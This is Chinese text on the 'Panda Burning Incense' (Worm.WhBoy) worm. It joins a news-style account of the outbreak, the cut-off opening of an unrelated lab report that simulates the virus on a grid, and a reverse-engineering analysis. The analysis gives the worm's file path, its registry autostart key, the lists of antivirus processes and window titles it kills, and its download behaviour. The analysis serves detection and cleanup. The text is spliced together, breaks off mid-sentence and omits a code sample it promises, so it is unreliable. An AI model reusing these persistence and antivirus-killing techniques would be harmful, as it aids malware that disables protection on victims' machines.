感染几千台计算机,严重时可以导致网络瘫痪。中毒电脑上会出现“熊猫烧香”图案,所以也被称为“熊猫烧香”病毒。中毒电脑会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象。 病毒危害 中毒时会弹出的窗口 病毒会删除扩展名为gho的文件,使用户无法使用ghost软件恢复操作系统。“熊猫烧香”感染系统的.exe .com. f.src .html.asp文件,添加病毒网址,导致用户一打开这些网页文件,IE就会自动连接到指定的病毒网址中下载病毒。在硬盘各个分区下生成文件autorun.inf和setup.exe,可以通过U盘和移动硬盘等方式进行传播,并且利用Windows 系统的自动播放功能来运行,搜索硬盘中的.exe可执行文件并感染,感染后的文件图标变成“熊猫烧香”图案。“熊猫烧香”还可以通过共享文件夹、用户简单密码等多种方式进行传播。该病毒会在中毒电脑中所有的网页文件尾部添加病毒代码。一些网站编辑人员的计算机如果被该病毒感染,上传网页到网站后,就会导致用户浏览这些网站时也被病毒感染。据悉,多家著名网站已经遭到此类攻击,而相继被植入病毒。由于这些网站的浏览量非常大,致使“熊猫烧香”病毒的感染范围非常广,中毒企业和政府机构已经超过千家,其中不乏金融、税务、能源等关系到国计民生的重要单位。注:江苏等地区成为“熊猫烧香”重灾区。变种病毒 至此,据不完全统计,仅12月份至今,变种数已达90多个,个人用户感染熊猫烧香的已经高达几百万,企业用户感染数还在继续上升。反防毒专家表示,伴随着各大杀毒厂商对“熊猫烧香”病毒的集中绞杀,该病毒正在不断“繁衍”新的变种,密谋更加隐蔽的传播方式。反病毒专家建议,用户不打开可疑邮件和可疑网站,不要随便运行不知名程序或打开陌生人邮件的附件。
数据结构熊猫烧香实验报告(含源码)
1、实验任务与目的(简单介绍实验内容,说明实验任务和目的) “熊猫烧香”是在网络中传播的一种著名病毒。现在某实验室的网络不幸感染了这种病毒。从教材P126的图6.5可以看到,实验室的机器排列为一个M行N列的矩阵,每台机器只和它相邻的及其直接相连。开始时有T台机器被感染,每台遭遇的熊猫变种类型都不同,分别记为Type1,Type2,…..,Typer。每台机器都具有一定级别的防御能力,将防御级别记为L(0 【工具】:Olydbg1.1、IDA5.0 【任务】:病毒分析以及解决方案 【操作平台】:Windows2003server 【作者】:LoveBoom[DFCG][FCG][CUG] 【链接】:N/A 【简要说明】:"离开党和人民一年"、荒废了一年,2006年可所谓沉迷于游戏从帝国到星际,总是追求着自己所谓的目标,而今回头看却发现不但没有达到自己的目标,反而是离生活越走越远了。现在动手写写也觉得自己穷词:-(。2006过了,不想自己的2007也是这样碌碌无为的过着。 关于这个病毒,我想很多朋友都知道,这个病毒在2007年初闹的比较凶,很多朋友曾经中过这病毒。这次我给大家带来的文章就是讲讲这个病毒。看看这病毒到底是怎么回事,我们应该怎么去处理这病毒。 【病毒分析】: 概要:这病毒我最早在10月底时接触,那时这病毒并没有现在这样流行(也许是病毒刚 出来吧)。曾经几个月的发展,前几天从同事那拿了几个新变种看了会,发现病毒和早期的版本相差比较大。根据病毒的差异,我自己将病毒分为:ABCD4个变种。各变种的不同处如下: A病毒将自身复制为%System32%\FuckJacks.exe,然后感染除特殊文件夹之外的文件夹中的可执行文件。 B病毒将自身复制为%System32%\Drivers\spoclsv.exe,感染时在c盘根目录下生成感染标记文件。 C病毒不再感染用户系统中的可执行文件,而是感染用户系统中的脚本病毒(这样的危害更大)?在每个感染后的文件夹中写下感染标记文件。 D感染用户可执行文件时不再使用A和B版本中的直接捆绑感染。用户中毒后可执行程序的图标不改变(a和b版本感染后可执行文件的图标都变成熊猫烧香)。 今天我分析的就是C版本(下次有空我将整理出A版本的分析资料),小版本可能会有所不同,因此如果你发现你机器上的和我所述的相似但不完全一样也是正常的。 中毒表象:以下几个特征为中毒的表现: 1、在系统中的每分区根目录下存在setup.exe和autorun.inf文件(A和B盘不感染)。 2、无法手工修改"文件夹选项"将隐藏的文件显示出来。 3、在每个感染后的文件夹中可见Desktop_.ini长度为12字节的隐藏文件(这个和Viking病毒一样)。 4、机器上的所有脚本文件(*.htm?*.html?*.asp?*.php?*.js?*.aspx)中存在以下代码: '5、中毒后机器上的常见反病毒软件无法开启和正常使用。 6、无法正常使用任务管理器、icesword之类的系统检测工具。 7、进程中可以找到伪系统正常进程的spoclsv.exe病毒进程。 8、系统自启动项中有病毒添加的注册表自启动项。 9、无故的向外发包、连接局域网中的其它机器。 Author:LoveBoom 一 病毒详细资料:病毒名称:Worm.WhBoy.h 病毒中文名:熊猫烧香(武汉男生) 病毒类型:蠕虫 危险级别:★★ 影响平台:Win 9x/ME,Win 2000/NT,Win XP,Win 2003 病毒描述: “武汉男生”,俗称“熊猫烧香”,这是一个感染型的蠕虫病毒,它能感染系统中exe,com,pif,src,html,asp等文件,它还能中止大量的反病毒软件进程并且会删除扩展名为gho 的文件,该文件是一系统备份工具GHOST的备份文件,使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。 1:拷贝文件 病毒运行后,会把自己拷贝到C:\WINDOWS\System32\Drivers\spoclsv.exe 2:添加注册表自启动 病毒会添加自启动项HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run svcshare -> C:\WINDOWS\System32\Drivers\spoclsv.exe 3:病毒行为 a:每隔1秒寻找桌面窗口,并关闭窗口标题中含有以下字符的程序: QQKav、QQAV、防火墙、进程、VirusScan、网镖、杀毒、毒霸、瑞星、江民、黄山IE、超级兔子、优化大师、木马克星、木马清道夫、QQ病毒、注册表编辑器、系统配置实用程序、卡巴斯基反病毒、Symantec AntiVirus、Duba、esteem proces、绿鹰PC、密码防盗、噬菌体、木马辅助查找器、System Safety Monitor、Wrapped gift Killer、Winsock Expert、游戏木马检测大师、msctls_statusbar32、pjf(ustc)、IceSword 并使用的键盘映射的方法关闭安全软件IceSword 添加注册表使自己自启动HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run svcshare -> C:\WINDOWS\System32\Drivers\spoclsv.exe 并中止系统中以下的进程: Mcshield.exe、VsTskMgr.exe、naPrdMgr.exe、UpdaterUI.exe、TBMon.exe、scan32.exe、Ravmond.exe、CCenter.exe、RavT ask.exe、Rav.exe、Ravmon.exe、RavmonD.exe、RavStub.exe、KVXP.kxp、kvMonXP.kxp、KVCenter.kxp、KVSrvXP.exe、KRegEx.exe、UIHost.exe、TrojDie.kxp、FrogAgent.exe、Logo1_.exe、Logo_1.exe、Rundl132.exe b:每隔18秒点击病毒作者指定的网页,并用命令行检查系统中是否存在共享,共存在的话就运行net share命令关闭admin$共享 c:每隔10秒下载病毒作者指定的文件,并用命令行检查系统中是否存在共享,共存在的话就运行net share命令关闭admin$共享 d:每隔6秒删除安全软件在注册表中的键值 并修改以下值不显示隐藏文件熊猫烧香 分析
病毒详细资料